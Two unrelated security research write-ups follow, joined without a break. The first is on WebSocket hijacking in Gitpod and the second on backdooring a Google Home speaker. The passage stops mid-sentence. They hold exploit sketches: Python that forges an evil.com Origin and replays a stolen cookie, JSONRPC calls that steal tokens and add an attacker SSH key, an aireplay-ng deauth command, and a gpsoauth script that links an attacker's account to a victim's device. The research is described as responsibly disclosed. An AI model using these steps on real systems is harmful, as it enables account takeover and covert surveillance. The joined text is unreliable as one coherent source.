This article walks through a current Snyk Security Labs research project focusing on cloud-based development environments (CDEs) — which resulted in a full workspace takeover on the Gitpod platform and extended to the user's SCM account. The issues described here were responsibly disclosed to Gitpod and resolved within a single working day!
Cloud development environments and Gitpod
As more and more companies begin to leverage cloud-based development environments for benefits such as improved performance, developer experience, consistent development environments, and low setup times, we couldn't help but wonder about the security implications of adopting these cloud-based IDEs.
First, let’s provide a brief overview of how CDEs operate so we can understand the difference between cloud-based and traditional, local-workstation based development — and how it changes the developer security landscape.
In contrast to traditional development, CDEs run on a cloud-hosted machine with an IDE backend. This typically provides a web application version of the IDE and support for integrating with a locally installed IDE over SSH, giving users a seamless and familiar experience. When using a CDE, the organization's code and any supporting services, such as a development database, are hosted within the cloud. Check out the following diagram for a visual representation of information flow in a CDE.
The security risks of locally installed development environments are not new. However, they historically haven't received much attention from developers. In May 2021, Snyk disclosed vulnerable VS Code extensions that led to a 1-click data leak or arbitrary command execution. These traditional workstation-based development environments, such as a local instance of VS Code or IntelliJ, carry other information security concerns — including hardware failure, data security, and malware. While these concerns can be addressed by employing Full Disk Encryption, version control, backups, and anti-malware systems, many questions remain unanswered with the adoption of cloud-based development environments:
What happens if a cloud IDE workspace is infected with malware?
What happens when access controls are insufficient and allow cross-user or even cross-organization access to workspaces?
What happens when a rogue developer exfiltrates company intellectual property from a cloud-hosted machine outside the visibility of the organization’s data loss prevention or endpoint security software?
In a current security research project here at Snyk, we examine the security implications of adopting cloud-based IDEs. In this article we present a case study of one of the vulnerabilities discovered during our initial exploration of the Gitpod platform.
Examining the Gitpod platform
Disclaimer: When it came to looking at cloud IDE solutions for our research, we considered only self-hosted or cloud-based solutions where the vendor has a clearly defined security policy providing safe harbor for researchers.
One of the most popular CDEs is Gitpod. Its wide adoption and extended feature set — including automated backups, Git integration out of the box, and multiple IDE backends — ensured that Gitpod was among the first products we looked into.
The first stage of our research involved becoming familiar with the basic workflows of Gitpod, setting up an organization, and experimenting with the product while capturing traffic using Burp Suite to observe the various APIs and transactions. We then pulled the Gitpod source code from GitHub to study the inner workings of its APIs, and reviewed any relevant architecture documentation to better understand each of the components and their function. A great resource for this was a video that provided an initial deep dive into the architecture of Gitpod. At a high level, Gitpod leverages multiple microservices deployed in a Kubernetes environment, where each user workspace is deployed to a dedicated ephemeral pod.
Gitpod’s primary set of external components are concerned with the dashboard, authentication, and the creation and management of workspaces, organizations, and accounts. At its core, the main component here is aptly named server, a TypeScript application that exposes a JSONRPC API over WebSocket that is consumed by a React frontend called dashboard.
From the dashboard, it's easy to integrate with an SCM provider, such as GitHub or Bitbucket, to import a repository and spin up a development environment — which then serves the source code and provides a working Git environment. Once the workspace is provisioned, it is made accessible via SSH and HTTPS on a subdomain of gitpod.io (i.e., https://[WORKSPACE_NAME].[CLUSTER_NAME].gitpod.io) through a Golang-based component called ws-proxy.
The security vulnerability that was discovered through our research relates primarily to the server component and the JSONRPC served over a WebSocket connection, which ultimately led to a workspace takeover in Gitpod.
Technical details
WebSockets and Same Origin Policy
WebSocket is a technology that allows for real-time, two-way communication between a client (typically a web browser) and a server. It enables a persistent connection between the client and server, allowing for continuous “real-time” data transfer without the need for repeated HTTP requests.
An interesting aspect of WebSockets from a security perspective is that the Same Origin Policy (SOP), a browser security mechanism, does not apply to them. SOP is the security control that prevents a website from issuing an AJAX request to another website and reading the response. If this were possible, it would present a security concern because browsers typically submit cookies along with every request (even for cross-origin requests, as in CSRF-related attacks). Without SOP, any website would be able to issue requests to foreign websites and obtain your data from other domains.
This leads us to the vulnerability class known as Cross-Site WebSocket Hijacking. This attack is similar to a combination of Cross-Site Request Forgery and a CORS misconfiguration. When a WebSocket handshake relies solely on HTTP cookies for authentication, a malicious website can instantiate a new WebSocket connection to the vulnerable application, allowing an attacker to both send and receive data through the connection.
When reviewing an application with WebSocket connections, it’s always worth examining this in depth. Let’s take a look at the WebSocket request for the Gitpod server.
In normal circumstances, the connection is successfully upgraded to a WebSocket and communication begins. No additional authentication takes place within the WebSocket exchange itself, and the JSONRPC methods can be invoked directly over the connection — a good sign for any potential attacker. Now, let's verify that no additional Origin checks are taking place by taking a handshake we observed and tampering with the Origin header.
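For illustration, this kind of check can also be scripted outside the browser. The sketch below uses Python's websocket-client package to replay a captured session cookie while forging the Origin header; the endpoint path and cookie name are assumptions rather than Gitpod's actual values (getLoggedInUser is one of the JSONRPC methods discussed later):

# Sketch: probe whether the server enforces Origin on the WebSocket
# handshake. The endpoint path and cookie name below are assumptions.
import json
import websocket  # pip install websocket-client

ws = websocket.create_connection(
    "wss://gitpod.io/api/v1",       # assumed JSONRPC-over-WebSocket endpoint
    origin="https://evil.com",      # forged cross-site Origin
    cookie="session=REDACTED",      # session cookie captured from the victim
)
# If the upgrade succeeded despite the foreign Origin, try a JSONRPC call.
ws.send(json.dumps({"jsonrpc": "2.0", "id": 1,
                    "method": "getLoggedInUser", "params": []}))
print(ws.recv())  # a user object here means no Origin or in-channel auth check
ws.close()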
This looks promising! It seems that the domain evil.com is able to issue cross-origin WebSocket requests to gitpod.io. However, another security mechanism introduces a challenge.
SameSite Cookie bypass
SameSite cookies are a fairly recent addition, providing partial mitigation against Cross-Site Request Forgery (CSRF) attacks. While not everyone has adopted them, most popular browsers now default any cookie that does not explicitly set a SameSite attribute to Lax. So while the underlying vulnerability is present, without a bypass for SameSite cookies our attack would be largely theoretical and would only work against a subset of outdated and niche browsers.
So what is a site in the context of SameSite? Simply put, the site corresponds to the combination of the scheme and the registrable domain (if any) of the origin's host. If we look at the specification for SameSite, we can see that subdomains are not considered. This is more relaxed than the definition of an origin used by the Same Origin Policy, which comprises a scheme + host (including subdomains) + port (e.g. https://security.snyk.io:8443).
Earlier, we observed that the workspace was exposed via a subdomain on gitpod.io. In the context of SameSite, the workspace URL is considered to be the same site as gitpod.io. So, it should be possible for one workspace to issue a cross-domain, same-site request to a *.gitpod.io domain with the original user's cookies attached. Let's see if we can leverage an attacker-controlled workspace to serve a WebSocket Hijacking payload.
To first verify that the cookies are indeed transmitted and the WebSocket communication is successfully achieved, let’s open the browser console from a workspace and attempt to initiate a WebSocket connection.
As we can see in the above screenshot, we attempt to open a new WebSocket connection and, once open, submit a JSONRPC request. We can see in the console output that a message has been received containing the result of our request, confirming that the cookies are submitted and the origin is permitted to open a WebSocket to gitpod.io.
We now need a way to serve JavaScript from the workspace that can be accessed by a Gitpod user. Looking through the features available, we found that it is possible to expose ports in the workspace and make them accessible using a command line utility called gitpod-cli, available on the path inside the workspace as gp. We can invoke gp ports expose 8080, and then set up a basic Python web server using python -m http.server 8080. This in turn creates a new subdomain where the exposed port can be accessed, as shown below.
However, the connection failed. This was somewhat concerning and required more investigation. We opened the source code, started looking for what could be causing the problem, and found the following regular expression pattern, which appears to be used to extract the workspace name from the URL.
The way this matching is performed results in the wrong workspace name being extracted, as demonstrated in the following screenshot:
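(Purely as an illustration of this class of bug — the sketch below is a hypothetical pattern, not Gitpod's actual regex: a name-extraction regex that does not account for the port prefix of exposed-port subdomains captures the wrong workspace name.)

# Hypothetical illustration only, not Gitpod's actual pattern: a regex that
# ignores the port prefix captures the wrong workspace name.
import re

pattern = re.compile(r"^(?P<name>[a-z0-9][a-z0-9-]+)\.")
host = "8080-mycoolworkspace.ws-eu01.gitpod.io"   # exposed-port subdomain
print(pattern.match(host)["name"])  # "8080-mycoolworkspace", not "mycoolworkspace"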
So, it looks like we can’t serve our content from an exposed port inside the Gitpod hosted workspace and we need another way. By now we already know that we have privileged access to a machine that’s running the VS Code service and is serving requests issued to our workspace URL — so can we abuse this in some way?
The initial idea was to terminate the vscode process and start a Python web server to serve an HTML file. Unfortunately, this did not work and resulted in the workspace being restarted; this appeared to be performed by a local service called supervisor. While testing this approach, however, we noticed that if we terminated the process without binding another process to the VS Code port, the supervisor service would automatically restart the vscode process, resulting in a brief hang of the UI without a full restart of the workspace.
This led to a promising idea: could we patch VS Code to serve a built-in exploit for us?
Patching VS Code was relatively easy. By comparing the original VS Code server source code to the distributed version, we quickly found a convenient location to serve the exploit.
VS Code contains an API endpoint at /version, which returns the commit of the current version:
We modified it so that the correct Content-Type of text/html and the contents of an HTML file were returned. Now, we terminated the vscode process, allowing our newly introduced changes to load into a newly spawned VS Code process instance:
Finally, we can leverage the JSONRPC methods getLoggedInUser, getGitpodTokens, getOwnerToken, and addSSHPublicKey to build a payload that grants us full control over the user's workspaces when an unsuspecting Gitpod user visits our link!
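The payload itself is JavaScript served from the patched workspace, but the call sequence it performs can be sketched from any WebSocket client. In the Python sketch below, only the method names come from our research; the endpoint, request framing, and parameter shapes are assumptions:

# Sketch of the JSONRPC call sequence the payload performs over the hijacked
# WebSocket. Framing and parameter shapes are assumptions; methods are real.
import json
import websocket  # pip install websocket-client

ws = websocket.create_connection("wss://gitpod.io/api/v1",
                                 cookie="session=VICTIM")  # victim's cookie
_id = 0

def rpc(method, *params):
    global _id
    _id += 1
    ws.send(json.dumps({"jsonrpc": "2.0", "id": _id,
                        "method": method, "params": list(params)}))
    return json.loads(ws.recv())

user = rpc("getLoggedInUser")                  # identify the victim
tokens = rpc("getGitpodTokens")                # enumerate API tokens
owner = rpc("getOwnerToken", "WORKSPACE_ID")   # per-workspace owner token
rpc("addSSHPublicKey", {"name": "attacker", "key": "ssh-ed25519 AAAA..."})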
Here it is in action:
We can see that we’ve been able to extract some sensitive information about the user account, and are notified that our SSH key has been added to the account. Let’s see if we can SSH to the workspace:
Mission successful! As shown above, we have full access to the user’s workspaces after they’ve visited a link we sent them!
Timeline
Mon, Feb. 13, 2023 — Vulnerability disclosed to vendor
In this post, we presented the first findings from our current research into Cloud Development Environments (CDEs) — which allowed a full account takeover through visiting a link, exploiting a commonly misunderstood vulnerability (WebSocket Hijacking), and leveraging a practical SameSite cookie bypass. As cloud developer workspaces are becoming increasingly popular, it’s important to consider the additional risks that are introduced.
We would like to praise Gitpod for their fantastic turnaround on addressing this security vulnerability, and look forward to presenting more of our findings on cloud-based remote development solutions in the near future.
I was recently awarded a total of $107,500 by Google for responsibly disclosing security issues in the Google Home smart speaker that allowed an attacker within wireless proximity to install a "backdoor" account on the device, enabling them to send commands to it remotely over the Internet, access its microphone feed, and make arbitrary HTTP requests within the victim's LAN (which could potentially expose the Wi-Fi password or provide the attacker direct access to the victim's other devices). These issues have since been fixed.
(Note: I tested everything on a Google Home Mini, but I assume that these attacks worked similarly on Google’s other smart speaker models.)
Investigation
I was messing with the Google Home and noticed how easy it was to add new users to the device from the Google Home app. I also noticed that linking your account to the device gives you a surprising amount of control over it.
Namely, the “routines” feature allows you to create shortcuts for running a series of other commands (e.g. a “good morning” routine that runs the commands “turn off the lights” and “tell me about the weather”). Through the Google Home app, routines can be configured to start automatically on your device on certain days at certain times. Effectively, routines allow anyone with an account linked to the device to send it commands remotely. In addition to remote control over the device, a linked account also allows you to install “actions” (tiny applications) onto it.
When I realized how much access a linked account gives you, I decided to investigate the linking process and determine how easy it would be to link an account from an attacker’s perspective.
So… how would one go about doing that? There are a bunch of different routes to explore when reverse engineering an IoT device, including (but not limited to):
Obtaining the device’s firmware by dumping it or downloading it from the vendor’s website
Static analysis of the app that interfaces with the device (in this case, the “Google Home” Android app), e.g. using Apktool or JADX to decompile it
Dynamic analysis of the app during runtime, e.g. using Frida to hook Java methods and print info about internal state
Intercepting the communications between the app and the device (or between the app/device and the vendor’s servers) using a “man-in-the-middle” (MITM) attack
Obtaining firmware is particularly difficult in the case of the Google Home because there are no debugging/flashing pins on the device's PCB, so the only way to read the flash is to desolder the NAND chip. Google also does not publicly provide firmware image downloads. As shown at DEFCON, though, it is possible.
However, in general, when reverse engineering things, I like to start with a MITM attack if possible, since it’s usually the most straightforward path to gaining some insight into how the thing works. Typically IoT devices use standard protocols like HTTP or Bluetooth for communicating with their corresponding apps. HTTP in particular can be easily snooped using tools like mitmproxy. I love mitmproxy because it’s FOSS, has a nice terminal-based UI, and provides an easy-to-use Python API.
Since the Google Home doesn't have its own display or user interface, most of its settings are controlled through the Google Home app. A little Googling revealed that some people had already begun to document the local HTTP API that the device exposes for the Google Home app to use. Google Cast devices (including Google Homes and Chromecasts) advertise themselves on the LAN using mDNS, so we can use dns-sd to discover them:
$ dns-sd -B _googlecast._tcp
Browsing for _googlecast._tcp
DATE: ---Fri 05 Aug 2022---
15:30:15.526 ...STARTING...
Timestamp A/R Flags if Domain Service Type Instance Name
15:30:15.527 Add 3 6 local. _googlecast._tcp. Chromecast-997113e3cc9fce38d8284cee20de6435
15:30:15.527 Add 3 6 local. _googlecast._tcp. Google-Nest-Hub-d5d194c9b7a0255571045cbf615f7ffb
15:30:15.527 Add 3 6 local. _googlecast._tcp. Google-Home-Mini-f09088353752a2e56bddbb2a27ec377
We can use nmap to find the port that the local HTTP API is running on:
$ nmap 192.168.86.29
Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-05 15:41
Nmap scan report for google-home-mini.lan (192.168.86.29)
Host is up (0.0075s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
8008/tcp open http
8009/tcp open ajp13
8443/tcp open https-alt
9000/tcp open cslistener
10001/tcp open scp-config
We see HTTP servers on ports 8008 and 8443. According to the unofficial documentation I linked above, 8008 is deprecated and only 8443 works now. (The other ports are for Chromecast functionality, and some unofficial documentation for those is available elsewhere on the Internet.) Let's try issuing a request:
Indeed, it’s rejecting the request because we’re not authorized. So how do we get the token? Well, the docs say that you can either extract it from the Google Home app’s private app data directory (if your phone is rooted), or you can use a script that takes your Google username and password as input, calls the API that the Google Home app internally uses to get the token, and returns the token. Both of these methods require that you have an account that’s already been linked to the device, though, and I wanted to figure out how the linking happens in the first place. Presumably, this token is being used to prevent an attacker (or malicious app) on the LAN from accessing the device. Therefore, it surely takes more than just basic LAN access to link an account and get the token, right…? I searched the docs but there was no mention of account linking. So I proceeded to investigate the matter myself.
Setting up the proxy
Intercepting unencrypted HTTP traffic with mitmproxy on Android is as simple as starting the proxy server then configuring your phone (or just the target app) to route all of its traffic through the proxy. However, the unofficial local API documentation said that Google had recently started using HTTPS. Also, I wanted to be able to intercept not only the traffic between the app and the Google Home device, but also between the app and Google’s servers (which is definitely HTTPS). I thought that since the linking process involved Google accounts, parts of the process might happen on the Google server, rather than on the device.
Intercepting HTTPS traffic on Android is a little trickier, but usually not terribly difficult. In addition to configuring the proxy settings, you also need to make the app trust mitmproxy's root CA certificate. You can install new CAs through Android Settings, but annoyingly, as of Android 7, apps using the system-provided networking APIs will no longer automatically trust user-added CAs. If you have a rooted Android phone, you can modify the system CA store directly (located at /system/etc/security/cacerts). Alternatively, you could manually patch the individual app. However, sometimes even that isn't enough, as some apps employ "SSL pinning" to ensure that the certificate used for SSL matches the one they were expecting. If the app uses the system-provided pinning APIs (javax.net.ssl) or uses a popular HTTP library (e.g. OkHttp), it's not hard to bypass; just hook the relevant methods with Frida or Xposed. While Xposed and the full version of Frida both require root, Frida Gadget can be used without root. If the app is using a custom pinning mechanism, you'll have to reverse engineer it and manually patch it out.
Patching and repacking the Google Home app isn’t an option because it uses Google Play Services OAuth APIs (which means the APK needs to be signed by Google or it’ll crash), so root access is necessary to intercept its traffic. Since I didn’t want to root my primary phone, and emulators tend to be clunky, I decided to use an old spare phone I had lying around. I rooted it using Magisk and modified the system CA store to include mitmproxy’s CA, but this wasn’t sufficient as the Google Home app appeared to be utilizing SSL pinning. To bypass the pinning, I used a Frida script I found on GitHub.
I could now see all of the encrypted traffic showing up in mitmproxy:
Even the traffic between the app and device was being captured. Cool!
Observing the link process
Alright, so let’s observe what happens when a new user links their account to the device. I already had my primary Google account linked, so I created a new account as the “attacker”. When I opened the Google Home app and signed in under the new account (making sure I was connected to the same Wi-Fi network as the device), the device showed up under “Other devices”, and when I tapped on it, I was greeted with this screen:
I pressed the button and it prompted me to install the Google Search app to continue. I guess the Voice Match setup is done through that app instead. But as an attacker I don’t care about adding my voice to the device; I only want to link my account. So is it possible to link an account without Voice Match? I thought that it must be, since the initial device setup was done entirely within the Home app, and I wasn’t required to enable Voice Match on my primary account. I was about to perform a factory reset and observe the initial account link, but then I realized something.
Much of the internal architecture of the Google Home is shared with Chromecast devices. According to a DEFCON talk, Google Home devices use the same operating system as Chromecasts (a version of Linux). The local API seems to be similar, too. In fact, the Home app's package name ends with chromecast.app, and it used to just be called "Chromecast". Back then, its only function was to set up Chromecast devices. Now it's responsible for setting up and managing not just Chromecasts, but all of Google's smart home devices.
Anyway, why not just try observing how the Chromecast link process works, then try to replicate it for use with the Google Home? It’s bound to be simpler, because Chromecasts don’t support Voice Match (nor the Google Assistant, for that matter). Luckily, I also had a few Chromecasts lying around. I plugged in one and found it within the Home app:
All I had to do was tap the “Enable voice control and more” banner and confirm, and then my account was linked! Ok, let’s see what happened on the network side:
We see a POST request to a /deviceuserlinksbatch endpoint on clients3.google.com:
It's a binary payload, but we can immediately see that it contains some device details (e.g. the device's name, "Office TV"). We see that the content-type is application/protobuf. Protocol Buffers is Google's binary data serialization format. Like JSON, data is stored in pairs of keys and values. The client and server exchanging protobuf data both have a copy of the .proto file, which defines the field names and data types (e.g. uint32, bool, string, etc.). During the encoding process, this data is stripped out, and all that remains are the field numbers and wire types. Fortunately, the wire types translate pretty directly back to the original data types (there are usually only a few possibilities as to what the original data type could have been based on the wire type). Google provides a command-line tool called protoc that allows us to encode and decode protobuf data. The --decode_raw option tells protoc to decode without the .proto file by guessing what the data types are. This raw decoding is usually enough to understand the data structure, but if it doesn't look right, you could create your own .proto with your data type guesses, try to decode, and if it still doesn't make sense, keep adjusting the .proto until it does.
Looks like the link request payload mainly consists of three things: device name, certificate, and "cloud ID". I quickly recognized these values from the earlier /setup/eureka_info local API requests. So it appears that the link process is:
Get the device’s info through its local API
Send a link request to the Google server along with this info
I wanted to use mitmproxy to re-issue a modified version of the request, replacing my Chromecast's info with the Google Home's info. I would eventually want to create a .proto file so I could use protoc --encode to create link requests from scratch, but at that point I just wanted to quickly test to see if it would work. I figured I could replace any strings in the binary payload without causing any problems as long as they were the same length. The cloud ID and cert were the same lengths, but the name ("Office speaker") was not, so I renamed the device in the Home app to make it that way. Then I issued the modified request, and it appeared to work. The Google Home's settings were unlocked in the Home app. Behind the scenes, I saw in mitmproxy that the device's local auth token was being sent along with local API requests.
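Same-length substitution works because protobuf strings are length-prefixed; as long as the replacement has exactly the same byte length, the surrounding framing stays valid. A sketch of the idea, with placeholder values:

# Same-length byte substitution in a serialized protobuf payload; the
# length prefixes remain valid. The IDs below are placeholders.
chromecast_id = b"AAAAAAAAAAAA"    # cloud ID from the captured request
google_home_id = b"BBBBBBBBBBBB"   # cloud ID from the Home's eureka_info
assert len(chromecast_id) == len(google_home_id)

with open("link_request.bin", "rb") as f:
    payload = f.read()
with open("link_request_patched.bin", "wb") as f:
    f.write(payload.replace(chromecast_id, google_home_id))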
Python re-implementation
The next thing I wanted to do was to re-implement the link process with a Python script so I didn't have to bother with the Home app any more.
To get the required device info, we just need to issue a request like:
GET https://[Google Home IP]:8443/setup/eureka_info?params=name,device_info,sign
Re-implementing the actual link request was a tad harder. First I examined the script mentioned by the unofficial local API docs that calls Google’s cloud APIs. It uses a library called gpsoauth which implements Android’s Google login flow in Python. Basically, it turns your Google username and password into OAuth tokens, which can be used to call undocumented Google APIs. It’s being used by some unofficial Python clients for Google services, like gkeepapi for Google Keep.
I used mitmproxy and gpsoauth to figure out and re-implement the link request. It looks like this:
POST https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b
Authorization: Bearer [token from gpsoauth]
[...some uninteresting headers added by the Home app...]
Content-Type: application/protobuf
[device info protobuf payload, described earlier]
To create the protobuf payload, I made a simple .proto file for the link request so I could use protoc --encode. I gave the fields I knew descriptive names, encoded a message with the same values as the message I captured from the Home app, and made sure that the binary output was the same.
Putting it all together, I had a Python script that takes your Google credentials and an IP address as input and uses them to link your account to the Google Home device at the provided IP.
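A minimal sketch of what such a script could look like is below. gpsoauth's perform_master_login/perform_oauth calls are real; the OAuth service scope, the app signature (taken from gpsoauth's examples), and the pre-built protobuf body are assumptions:

# Sketch: turn Google credentials into an OAuth token with gpsoauth, then
# replay the link request. Scope and signature values are assumptions.
import gpsoauth   # pip install gpsoauth
import requests

EMAIL, PASSWORD, ANDROID_ID = "attacker@gmail.com", "app-password", "0123456789abcdef"

master = gpsoauth.perform_master_login(EMAIL, PASSWORD, ANDROID_ID)
auth = gpsoauth.perform_oauth(
    EMAIL, master["Token"], ANDROID_ID,
    service="oauth2:https://www.googleapis.com/auth/homegraph",  # assumed scope
    app="com.google.android.apps.chromecast.app",
    client_sig="38918a453d07199354f8b19af05ec6562ced5788",  # sig from gpsoauth examples
)

with open("link_request.bin", "rb") as f:   # device info payload, built earlier
    body = f.read()

r = requests.post(
    "https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b",
    headers={"Authorization": f"Bearer {auth['Auth']}",
             "Content-Type": "application/protobuf"},
    data=body,
)
print(r.status_code)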
Further investigation
Now that I had my Python script, it was time to think from the perspective of an attacker. Just how much control over the device does a linked account give you, and what are some potential attack scenarios? I first targeted the routines feature, which allows you to execute voice commands on the device remotely. Doing some more research into previous attacks on Google Home devices, I encountered the "Light Commands" attack, which provided some inspiration for coming up with commands that an attacker might use:
Control smart home switches
Open smart garage doors
Make online purchases
Remotely unlock and start certain vehicles
Open smart locks by stealthily brute forcing the user's PIN
I wanted to go further though and come up with an attack that would work on all Google Home devices, regardless of how many other smart devices the user has. I was trying to come up with a way to use a voice command to activate the microphone and exfiltrate the data. Perhaps I could use voice commands to load an application onto the device which opens the microphone? Looking at the "conversational actions" docs, it seemed possible to create an app for the Google Home and then invoke it on a linked device using the command "talk to my test app". But these "apps" can't really do much. They don't have access to the raw audio from the microphone; they only get a transcription of what the user says. They don't even run on the device itself. Rather, the Google servers talk to your app via webhooks on the device's behalf. The "smart home actions" seemed more interesting, but that's something I explored later.
All of a sudden it hit me: these devices support a “call [phone number]” command. You could effectively use this command to tell the device to start sending data from its microphone feed to some arbitrary phone number.
Creating malicious routines
The interface for creating a routine within the Google Home app looks like this:
With the help of mitmproxy, I learned that this is actually just a WebView that embeds the website https://assistant.google.com/settings/routines, which loads fine in a normal web browser (as long as you're logged in to a Google account). This made reverse engineering it a little easier.
I created a routine to execute the command “call [my phone number]” on Wednesdays at 8:26 PM (it was currently a Wednesday, at 8:25 PM). For routines that run automatically at certain times, you need to specify a “device for audio” (a device to run the routine on). You can choose from a list of devices linked to your account:
A minute later, the routine executed on my Google Home, and it called my phone. I picked up the phone and listened to myself talking through the Google Home’s microphone. Pretty cool!
(Later through inspecting network requests, I found that you can specify not only the hour and minute to activate the routine at, but also the precise second, which meant I only had to wait a few seconds for my routines to activate, rather than about a minute.)
An attack scenario
I had a feeling that Google didn’t intend to make it so easy to access the microphone feed on the Google Home remotely. I quickly thought of an attack scenario:
Attacker wishes to spy on victim.
Victim installs attacker’s malicious Android app.
App detects a Google Home on the network via mDNS.
App uses the basic LAN access it’s automatically granted to silently issue the two HTTP requests necessary to link the attacker’s account to the victim’s device (no special permissions necessary).
Attacker can now spy on the victim through their Google Home.
This still requires social engineering and user interaction, though, which isn’t ideal from an attacker’s perspective. Can we make it cooler?
From a more abstract point of view, the combined device information (name, cert, and cloud ID) basically acts as a “password” that grants remote control of the device. The device exposes this password over the LAN through the local API. Are there other ways for an attacker to access the local API?
In 2019, “CastHack” made the news, as it was discovered that thousands of Google Cast devices (including Google Homes) were exposed to the public Internet. At first it was believed that the issue was these devices’ use of UPnP to automatically open ports on the router related to casting (8008, 8009, and 8443). However, it appears that UPnP is only used by Cast devices for local discovery, not for port forwarding, so the likely cause was a widespread networking misconfiguration (that might be related to UPnP somehow).
The people behind CastHack didn’t realize the true level of access that the local API provides (if combined with cloud APIs):
What can hackers do with this?
Remotely play media on your device, rename your device, factory reset or reboot the device, force it to forget all wifi networks, force it to pair to a new bluetooth speaker/wifi point, and so on.
(These are all local API endpoints, documented by the community already. This was also before the local API started requiring an auth token.)
What CAN’T hackers do with this?
Assuming the Chromecast/Google Home is the only problem you have, hackers CANNOT access other devices on the network or sniff information besides WIFI points and Bluetooth devices. They also don’t have access to your personal Google account, nor the Google Home’s microphone.
There are services like Shodan that allow you to scan the Internet for open ports and vulnerable devices. I was able to find hundreds of Cast devices with port 8443 (local API) publicly exposed using some simple search queries. I didn’t pursue this for very long though, because ultimately bad router configuration is not something Google can fix.
While I was reading about CastHack, however, I encountered articles all the way back from 2014 (!) about the “RickMote”, a PoC contraption developed by Dan Petro, security researcher at Bishop Fox, that hijacks nearby Chromecasts and plays “Never Gonna Give You Up” on YouTube. Petro discovered that, when a Chromecast loses its Internet connection, it enters a “setup mode” and creates its own open Wi-Fi network. The intended purpose is to allow the device’s owner to connect to this network from the Google Home app and reset the Wi-Fi settings (in the event that the password was changed, for example). The “RickMote” takes advantage of this behavior.
It turns out that it's usually really easy to force nearby devices to disconnect from their Wi-Fi network: just send a bunch of "deauth" packets to the target device. WPA2 provides strong encryption for data frames (as long as you choose a good password). However, "management" frames, like deauthentication frames (which tell clients to disconnect), are not encrypted. 802.11w and WPA3 support encrypted management frames, but the Google Home Mini doesn't support either of these. (Even if it did, the router would need to support them as well for it to work, and this is rare among consumer home routers at this time due to potential compatibility issues. And finally, even if both the device and router supported them, there are still other methods for an attacker to disrupt your Wi-Fi. Basic channel jamming is always an option, though this requires specialized, illegal hardware. Ultimately, Wi-Fi is a poor choice for devices that must be connected to the Internet at all times.)
I wanted to check if this "setup mode" behavior was still in use on the Google Home. I installed aircrack-ng and used the following command to launch a deauth attack:
aireplay-ng --deauth 0 -a [router BSSID] -c [device MAC address] [interface]
My Google Home immediately disconnected from the network and then made its own:
I connected to the network and used netstat to get the router's IP (the router being the Google Home), and saw that it assigned itself the IP 192.168.255.249. I issued a local API request to see if it would work:
I was shocked to see that it did! With this information, it’s possible to link an account to the device and remotely control it.
A cooler attack scenario
Attacker wishes to spy on victim. Attacker can get within wireless proximity of the Google Home (but does NOT have the victim’s Wi-Fi password).
Attacker discovers victim's Google Home by listening for MAC addresses with prefixes associated with Google Inc. (e.g. E4:F0:42).
Attacker sends deauth packets to disconnect the device from its network and make it enter setup mode.
Attacker connects to the device’s setup network and requests its device info.
Attacker connects to the Internet and uses the obtained device info to link their account to the victim’s device.
Attacker can now spy on the victim through their Google Home over the Internet (no need to be within proximity of the device anymore).
What else can we do?
Clearly a linked account gives a tremendous amount of control over the device. I wanted to see if there was anything else an attacker could do. We were now accounting for attackers that aren’t already on the victim’s network. Would it be possible to interact with (and potentially attack) the victim’s other devices through the compromised Google Home? We already know that with a linked account you can:
Get the local auth token and change device settings through the local API
Execute commands on the device remotely through “routines”
Install “actions”, which are like sandboxed applications
Earlier I looked into “conversational actions” and determined that these are too sandboxed to be useful as an attacker. But there is another type of action: “smart home actions”. Device manufacturers (e.g. Philips) can use these to add support for their devices to the Google Home platform (e.g. when the user says “turn on the lights”, their Philips Hue light bulbs will receive a “turn on” command).
One thing I found particularly interesting while reading the documentation was the “Local Home SDK”. Smart home actions used to only run through the Internet (like conversational actions), but Google had recently (April 2020) introduced support for running these locally, improving latency.
The SDK lets you write a local fulfillment app, using TypeScript or JavaScript, that contains your smart home business logic. Google Home or Google Nest devices can load and run your app on-device. Your app communicates directly with your existing smart devices over Wi-Fi on a local area network (LAN) to fulfill user commands, over existing protocols.
Sounded promising. I looked into how it works though and it turns out that these local home apps don’t have direct LAN access. You can’t just connect to any IP you want; rather, you need to specify a “scan configuration” using mDNS, UPnP or UDP broadcast. The Google Home scans the network on your behalf, and if any matching devices are found, it will return a JavaScript object that allows your app to interact with the device over TCP/UDP/HTTP.
Is there any way around this? I noticed that the docs said something about debugging using Chrome DevTools. It turns out that when a local home app is running in testing mode (deployed to the developer’s own account), the Google Home opens port 9222 for the Chrome DevTools Protocol (CDP). CDP access provides complete control over the Chrome instance. For example, you can open or close tabs, and intercept network requests. That got me thinking, maybe I could provide a scan configuration that instructs the Google Home to scan for itself, so I would be able to connect to CDP, take control of the Chrome instance running on the device, and use it to make arbitrary requests within the LAN.
I created a local home app using my linked account and set up the scan config to search for the _googlecast._tcp.local mDNS service. I rebooted the device, and the app loaded automatically. It quickly found itself and I was able to issue HTTP requests to localhost!
CDP uses WebSockets, which can be accessed through the standard JS API. The same-origin policy doesn't apply to WebSockets, so we can easily initiate a WebSocket connection to localhost from our local home app (hosted on some public website) without any problems, as long as we have the correct URL. Because CDP access could lead to trivial RCE on the desktop version of Chrome, the WebSocket address is randomly generated each time debugging is enabled, to prevent random websites from connecting. The address can be retrieved through a GET request to http://[CDP host]:9222/json. This is normally protected by the same-origin policy, so we can't just use an XHR request, but since we have full access to localhost through the Local Home SDK, we can use that to make the request. Once we have the address, we can use the JS WebSocket() constructor to connect.
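In the attack these two steps run as JavaScript inside the local home app; for illustration, the same handshake performed from a machine on the LAN might look like this:

# Sketch: fetch the per-boot CDP WebSocket URL from /json, then connect.
import json
import requests
import websocket  # pip install websocket-client

targets = requests.get("http://192.168.86.132:9222/json").json()  # Home's IP
ws = websocket.create_connection(targets[0]["webSocketDebuggerUrl"])
ws.send(json.dumps({"id": 1, "method": "Browser.getVersion"}))
print(ws.recv())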
Through CDP, we can send arbitrary HTTP requests within the victim’s LAN, which opens up the victim’s other devices for attack. As I describe later, I also found a way to read and write arbitrary files on the device using CDP.
Since the security issues have been fixed, none of these probably work anymore, but I thought they were worth documenting/preserving.
PoC #1: Spy on victim
I made a PoC that works on my Android phone (via Python on Termux) to demonstrate how quick and easy the process of linking an account could be. The attack described here could be performed within the span of a few minutes.
For the PoC, I re-implemented the device link and routines APIs in Python, and made the following utilities:
